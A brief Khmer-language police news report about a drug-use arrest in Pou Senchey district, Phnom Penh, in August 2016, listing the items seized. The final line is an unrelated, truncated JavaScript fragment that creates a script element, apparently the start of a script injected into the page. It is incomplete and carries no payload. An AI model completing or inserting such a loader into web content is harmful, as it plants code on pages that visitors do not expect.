ជនសង្ស័យម្នាក់ត្រូវកម្លាំងនគរបាលខណ្ឌពោធិ៍សែនជ័យឃាត់ខ្លួនជាប់ពាក់ព័ន្ធនិងការប្រើប្រាស់គ្រឿងញៀន
ភ្នំពេញ៖ កម្លាំងនគរបាលខណ្ឌពោធិ៍សែនជ័យឃាត់ខ្លួនជនសង្ស័យម្នាក់ជាប់ពាក់ព័ន្ធនិងការប្រើប្រាស់ គ្រឿង ញៀន។ ការឃាត់ខ្លួននេះធ្វើឡើងកាលពីវេលាម៉ោង ១១ និង១០នាទីព្រឹកថ្ងៃទី ២៩ខែសីហា ឆ្នាំ ២០១៦ នៅចំណុចភូមិអង្គ សង្កាត់ចោមចៅ ខណ្ឌពោធិ៍សែនជ័យ រាជធានីភ្នំពេញ។
ប្រភពពីលោកវរសេនីយ៍ទោ យឹម សារ៉ាន់ បានប្រាប់ TNN ថាជនសង្ស័យខាងលើមានឈ្មោះ តំ វែង ភេទ ប្រុស អាយុ ២៥ឆ្នាំ មុខរបរ មិនពិតប្រាកដ ស្នាក់នៅភូមិអង្គ សង្កាត់ចោមចៅ ខណ្ឌពោធិ៍សែនជ័យ រាជធានីភ្នំពេញ។
ក្នុងរឹបអូសបានវត្ថុតាង ថងសំរាប់ច្រក់ថ្នាំញៀនមួយចំនួន ស្លាកលេខម៉ូតូក្លែងក្លាយចំនួនមួយ (ភ្នំពេញ 1BK-7799)។
បច្ចុប្បន្នជនសង្ស័យខាងលើកំពុងសាកសួរនៅប៉ុស្តិ៍រដ្ឋបាលសង្កាត់ចោមចៅ និងបញ្ជូនបន្តមកអធិការ ដ្ឋាននគរបាលខណ្ឌពោធិ៍សែនជ័យចាត់ការបន្តតាមនិតិវិធី។
var d=document;var s=d.createElement(‘script’);